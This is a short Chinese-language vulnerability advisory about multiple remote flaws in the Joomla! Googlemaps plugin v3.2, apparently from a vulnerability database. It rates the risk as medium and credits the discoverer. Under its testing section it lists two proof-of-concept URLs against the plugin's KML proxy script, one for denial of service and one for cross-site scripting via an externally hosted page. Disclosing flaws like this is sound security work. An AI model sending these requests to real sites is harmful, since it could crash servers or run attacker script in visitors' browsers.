Joomla! Googlemaps Plugin多个远程安全漏洞

日期: 2013/08/01 | 标签:joomla | 游览：383

漏洞起因
输入验证错误
危险等级
中

影响系统
Joomla! Googlemaps Plugin v3.2

不受影响系统

危害
远程攻击者可以利用漏洞可使应用程序崩溃或获取敏感信息。
CVSSv2:

攻击所需条件
攻击者必须访问Joomla! Googlemaps插件。

漏洞信息
Joomla! Googlemaps plugin是一款用于Joomla!的插入google地图的插件。
Joomla! Googlemaps插件存在多个安全漏洞，允许远程攻击者利用漏洞进行拒绝服务或跨站脚本攻击，可使应用程序崩溃或获取敏感信息。

测试方法
拒绝服务攻击：
http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1
跨站脚本攻击：
http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1
安全建议

厂商解决方案
目前没有详细解决方案提供：
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

漏洞提供者
Benjamin Kunz Mejri

← FreeBSD ‘nfsserver’ Module CVE-2013-4851访问绕过漏洞

Microsoft Internet Explorer本地安全绕过漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

Joomla! Googlemaps Plugin多个远程安全漏洞

评论关闭。